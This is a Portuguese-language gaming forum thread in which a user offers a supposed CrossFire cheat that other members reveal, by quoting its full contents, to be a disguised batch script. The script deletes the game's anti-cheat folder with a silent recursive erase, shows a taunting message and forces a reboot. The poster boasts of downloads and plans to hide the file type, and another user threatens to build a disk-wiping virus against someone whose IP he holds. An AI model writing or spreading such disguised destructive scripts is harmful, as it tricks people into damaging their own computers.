Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

O Hacker dos hacker 'em português'

Posts Recomendados

dexa quieto meu pc desligou.

mas eu peguei o ip do fdp eu vou foder com a vida dele .

da outra vez esse fdp apagou meu hd.

meu primo estava baixando hj ele nao me escapa.

vou fazer virus de apagar o hd e ele nao vai recuperar mais.

nem na assistencia tecnica.

hahahahaha quam vai rir agira Idiot

Link para o comentário
Compartilhar em outros sites

Gente, por favor, não desliga o pc e nem é vírus.

Tem anti virus que não deixa entrar no hacker e ao iniciar o hacker com o anti-virús ligado o 'AVAST' reinicia o pc, os outros anti-virús que eu testei não desliga mais o avast sim. Gente desliguem o avast antes de ligar o hacker.

Esse hacker é .bat porque eu não fiz ele em programas de criação de outros programas, eu fiz ele escrevendo na mão, com o bloco de notas. Ele é um vírus que usa os recursos do computador para dar vantagens no jogo, isso explica porque ele é mega leve e alivia o pc.

Link para o comentário

Cara, vai ser noob assim lah na China!

Tópico sem Scan

Sem Tutorial

Sem Cores

Alguém da Closed aki ~~

PS: Cara, qual é a possibilidade de alguém for burro e abrir isso aí??? kkkkkkk e vc q se acha o "TAL"

PS²: Galera, ele postou um arquivo com extensão .bat, é um vírus inofensivo, mas recomendo não abrir;

@edit:

Asshausahsuhasuhasuhas rachei de rir agora kkkkkk

Olha o que esse noob escreveu dentro do arquivo com a extensão .bat:

cd..

cd..

cd..

cd..

cd arquivos de programas

cd Z8Games

cd CrossFire

ERASE cd HGWC /q /s

MSG * Pronto, agora pode entrar no CrossFire e se divertir a vontade com o poderoso Hacker 'OneHit'. husauhsausausauhshusuhsauhsauhsa' Já já você vai descobrir porque eu estou rindo =D

shutdown -r -c " Eu só estava zuando. Não existe hacker e você tem sorte de eu não destruir seu pc agora mesmo, não use hack, pois o próxima coisa que você baixa pode muito bem deleta o windows do seu pc." -t 13

KKKKKKKKKKKKK

Link para o comentário

Noob é quem estraga um jogo tão bom como o Crossfire. Eu adoro jogar modo de mutação, só que os hacker ficam estragando o jogo.Bem o george colossi, tem gente que caí nessa, e sabe porque? eu postei o vídeo e o hacker hoje de manha e já tem 98 downloads, mais se você não usou ele mesmo assim digo obrigado por pelo menos baixar e me dar 10 centavos, que é o custo do download.

george colossi, é, parece que fazer um arquivo .bat está causando um pouco de desconfiança. Vou armar esse arquivo no Makerpron para não deixa-lo .bat.

E respondendo a sua pergunta a possibilidade de alguém ser burro para abrir é 96%

E outra, noob é esse seu rank aqui

sign.php?usn=11643666

Você mau saio das fraudas nesse jogo, muleque.

Link para o comentário

Noob é quem estraga um jogo tão bom como o Crossfire. Eu adoro jogar modo de mutação, só que os hacker ficam estragando o jogo.Bem o george colossi, tem gente que caí nessa, e sabe porque? eu postei o vídeo e o hacker hoje de manha e já tem 98 downloads, mais se você não usou ele mesmo assim digo obrigado por pelo menos baixar e me dar 10 centavos, que é o custo do download.

george colossi, é, parece que fazer um arquivo .bat está causando um pouco de desconfiança. Vou armar esse arquivo no Makerpron para não deixa-lo .bat.

E respondendo a sua pergunta a possibilidade de alguém ser burro para abrir é 96%

E outra, noob é esse seu rank aqui

sign.php?usn=11643666

Você mau saio das fraudas nesse jogo, muleque.

Kkkkkkkkkkk eu tenho outra acc seu burro LOL, eu não tenho só essa seu idiota.

Link para o comentário

Kkkkkkkkkkk eu tenho outra acc seu burro LOL, eu não tenho só essa seu idiota.[/font][/b]

Entra nesse site

É necessário se cadastrar para acessar o conteúdo.
esse sim é um site adequado para a sua idade.

é muito bom gente baixem!

Link para o comentário

Não baixem

Aquivo .bat

Assim que você extrai da m no PC

Melhor avisar a algum MOD

Meu Avatar:d0ca633.png

Meta:25805950.png

Sonho:imagescaxunc9m.jpg

Gostoou Agradeça Nãao Custa ZP e Neem Caii O Dedo

Quer 20k De Zp Gratis Em 10 Dias e So Click Ali Na Url E Se-Registrar:

Link para o comentário

SCAN:

INOFENSIVO MAS OLHA QUANDO CLIQUEI EM EDITAR NO .BAT!: cd..

cd..

cd..

cd..

cd arquivos de programas

cd Z8Games

cd CrossFire

ERASE cd HGWC /q /s

MSG * Pronto, agora pode entrar no CrossFire e se divertir a vontade com o poderoso Hacker 'OneHit'. husauhsausausauhshusuhsauhsauhsa' Já já você vai descobrir porque eu estou rindo =D

shutdown -r -c " Eu só estava zuando. Não existe hacker e você tem sorte de eu não destruir seu pc agora mesmo, não use hack, pois o próxima coisa que você baixa pode muito bem deleta o windows do seu pc." -t 13

QUEM É O noob pra abrir uma MERDA dessas kkkkk ESSA POGA DELETA O ARQUIVO HGWC (Game Wacher & X-Trap) ACABA COM O JOGO SO reinstalando resolve!

Link para o comentário

o SEU filha da pita acha que sou troxa eu abaixei essa bosta ae e desligou meu pc seu otario alguem da BANI aaki nesse otario seu nome e hackershowdebola mais podia ser to fudido seu cusao vai se catar seu manesao da bani aki

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.